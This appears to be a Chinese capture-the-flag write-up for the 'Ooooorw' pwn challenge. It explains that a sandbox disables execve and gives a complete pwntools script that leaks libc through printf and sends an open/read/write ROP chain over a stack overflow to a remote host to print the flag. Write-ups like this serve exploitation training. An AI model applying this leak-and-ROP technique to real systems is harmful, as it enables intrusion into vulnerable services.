例题:NPCCTF - Ooooorw
发现开启了沙箱,禁用了execve函数,所以只能利用open,read,write函数来进行输出flag
from pwn import *file = './pwn'libc = ELF('./libc.so.6')i = 0if i == 1: io = process(file)else: io = remote('175.27.249.18',32438)elf = ELF(file)context.arch = 'amd64'context.log_level = 'debug'#gdb.attach(io)#---------- EXP ----------io.recvuntil(b'0x')printf_addr = int(io.recv(12),16)libcbase = printf_addr - libc.sym['printf']pop_rdi = 0x2a3e5 + libcbasepop_rsi = 0x2be51 + libcbasepop_rdx_rbx = 0x904a9 + libcbaseopen1 = libcbase + libc.symbols['open']write1 = libcbase + libc.symbols['write']puts = libcbase + libc.symbols['puts']read1 = libcbase + libc.symbols['read']syscall = libcbase + libc.symbols['syscall']bss = 0x403500payload = b'a'*0x58 + p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(bss) + p64(pop_rdx_rbx) + p64(0x8) + p64(0) + p64(read1)payload += p64(pop_rdi) + p64(2) + p64(pop_rsi) + p64(bss) + p64(pop_rdx_rbx) + p64(0) + p64(0) + p64(syscall)payload += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(bss) + p64(pop_rdx_rbx) + p64(0x100) + p64(0) + p64(read1)payload += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(bss) + p64(pop_rdx_rbx) + p64(0x100) + p64(0) + p64(write1)io.sendlineafter(b'Try to PWN.\n',payload)io.sendline(b'/flag\x00')io.interactive()
在payload部分,首先使用read将"/flag"写入到bss段,然后利用open打开这个文件,利用read读取问价内容并写入到bss段,最后利用write输出flag
![[计算机网络/网络抓包/以太网] `.pcap` 数据报文存储格式](https://blog-static.cnblogs.com/files/johnnyzen/cnblogs-qq-group-qrcode.gif?t=1679679148)
